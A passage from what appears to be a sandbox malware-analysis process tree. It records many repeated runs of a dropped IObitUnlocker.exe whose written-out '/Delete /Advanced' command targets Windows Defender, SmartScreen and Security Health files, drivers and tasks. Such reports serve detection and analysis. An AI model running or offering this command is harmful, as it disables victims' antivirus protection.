Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:4904
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:3580
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1700
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1888
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4648
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:3916
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:1804
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1284
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2788
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3160
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:1188
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 